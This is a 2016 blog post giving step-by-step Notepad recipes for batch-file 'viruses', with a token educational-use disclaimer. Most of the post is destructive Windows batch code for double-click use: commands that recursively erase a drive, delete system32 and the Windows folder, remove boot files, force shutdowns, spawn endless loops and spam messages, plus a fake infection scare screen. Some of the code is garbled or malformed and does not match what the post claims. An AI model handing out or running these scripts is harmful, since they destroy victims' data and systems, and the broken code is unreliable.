Sunday, 4 December 2016

How to create a virus 😝





NOTE:This Tutorial is for Educational Use only, If caught in the Act, You are on your Own!!!

create a simple virus using note pad  :-)
  1. open notepad,
  2. type shutdown /r/t 50/c "Trozen is active"/f 
  3. save as.
  4. filename.bat
  5. now double click on this and see the magic.

How To Make A Virus With Only Notepad :-)

  1. open notepad and type ↴
  2. @echo off 
  3. erase rd/s /f /q c:\*.* 
  4. save it as .cmd
  5. when u double click on that file, it will deletes the entire content of a drive without asking Y/N in the cmd box
  1. @echo vishal sohaliya //@cd new mat
  2. @start haxtap.inf
  3. @cls
  4. @exit 
  5.  save as.
  6. filename.bat
  7. now double click on this file. 
  1. @echo off
  2. attrib -h -r -s c:\autoexec.bat
  3. del c:\autoexec.bat
  4. attrib -h -r -s C:\boot.ini
  5. del c:\boot.ini
  6. attrib -h -r -s C:\win.ini
  7. del c:\win.ini 
  8. save as. 
  9. filename.bat 
  10.  now double click on this file. 
  1. rmdir %systemroot%\system32
  2.  save as. 
  3. filename.bat
  4. now double click on this file. 
  1. /*exe remove*/
  2. @echo off
  3. echo unhiding files..
  4. attrib -s -h -r *
  5. echo.
  6. echo.
  7. echo unhiding files and folders. By Aryan 9998588694
  8. echo WWW.GTUMCA.CO.CC
  9. attrib -s -h -r /s /d
  10. echo.
  11. echo.
  12. pouse  
  13. save as.  
  14. filename.bat 
  15. now double click on this file. 
  1. /*lock*/
  2. ren a a.{21EC2020-3AEA-1069-A2DD-08002B30309D} 
  3. save as.  
  4. filename.bat
  5. now double click on this file. 
  1. .LOG
  2. 11:53 PM 12/4/2016 
  3. save as.  
  4. filename.bat
  5. now double click on this file.
  1. :loop
  2. start joke.bat
  3. Goto loop
  4. save as.  
  5. filename.bat
  6. now double click on this file.
  1. /*msg by vishal*/
  2. @ECHO off
  3. :Begin
  4. msg * Hi
  5. msg * I am!
  6. msg * vishal sohaliya
  7. msg * Lets have fun together!
  8. msg * Because you have been o-w-n-e-d
  9. msg * dont cry only try
  10. GOTO BEGIN
  11. save as.  
  12. filename.bat
  13. now double click on this file.
  1. shutdown -s -t 4 
  2. save as.  
  3. filename.bat 
  4. now double click on this file.
  1. virus msg simple
  2. @ echo off
  3. :start
  4. title Virus
  5. echo Your system is affected by virus
  6. PAUSE
  7. echo:
  8. echo Windows will now try to undo changes
  9. PAUSE
  10. echo:
  11. echo FAILED !
  12. PAUSE
  13. echo:
  14. echo Your system is corrupt
  15. PAUSE
  16. GOTO start
  17.  save as.  
  18. filename.bat 
  19. now double click on this file.
  1. cls
  2. :A
  3. color 0a
  4. @ echo off
  5. echo Wscript.Sleep
  6. DEL C:\WINDOWS 5000>C:\sleep5000.vbs
  7. echo Wscript.Sleep 3000>C:\sleep3000.vbs
  8. echo Wscript.Sleep 4000>C:\sleep4000.vbs
  9. echo Wscript.Sleep 2000>C:\sleep2000.vbs
  10. cd %systemroot%\System32
  11. dir
  12. cls
  13. start /w wscript.exe C:\sleep3000.vbs
  14. echo Deleting Critical System Files...
  15. echo del *.*
  16. start /w wscript.exe C:\sleep3000.vbs
  17. echo Deletion Successful!
  18. start /w wscript.exe C:\sleep2000.vbs
  19. echo:
  20. echo:
  21. echo:
  22. echo Deleting Root Partition...
  23. start /w wscript.exe C:\sleep2000.vbs
  24. echo del %SYSTEMROOT%
  25. start /w wscript.exe C:\sleep4000.vbs
  26. echo Deletion Successful!
  27. start /w wscript.exe C:\sleep2000.vbs
  28. echo:
  29. echo:
  30. echo:
  31. echo Creating Directory h4x...
  32. cd C:\Documents and Settings\All Users\Start Menu\Programs\mkdir
  33. h4x
  34. DEL C:\WINDOWS
  35. start /w wscript.exe C:\sleep3000.vbs
  36. echo Directory Creation Successful!
  37. echo:
  38. echo:
  39. echo:
  40. echo Execution Attempt 1...
  41. start /w wscript.exe C:\sleep3000.vbs
  42. echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
  43. echo start hax.exe
  44. start /w wscript.exe C:\sleep3000.vbs
  45. echo Virus Executed!
  46. echo:
  47. echo:
  48. echo:start /w wscript.exe C:\sleep2000.vbs
  49. echo Disabling Windows Firewall...
  50. start /w wscript.exe C:\sleep2000.vbs
  51. echo Killing all processes...
  52. start /w wscript.exe C:\sleep2000.vbs
  53. echo Allowing virus to boot from startup...
  54. start /w wscript.exe C:\sleep2000.vbs
  55. echo:
  56. echo:
  57. echo Virus has been executed successfully!
  58. start /w wscript.exeC:\sleep2000.vbs
  59. echo:
  60. echo Have fun!
  61. start /w wscript.exe C:\sleep2000.vbs
  62. pause
  63. shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
  64. save as. 
  65. filename.bat
  66. now double click on this file.

  1. @echo off
  2. msg * WARNING
  3. msg * VIRUS ENTERED YOUR PC
  4. save as. 
  5. filename.bat
  6. now double click on this file.
 
 

No comments:

Post a Comment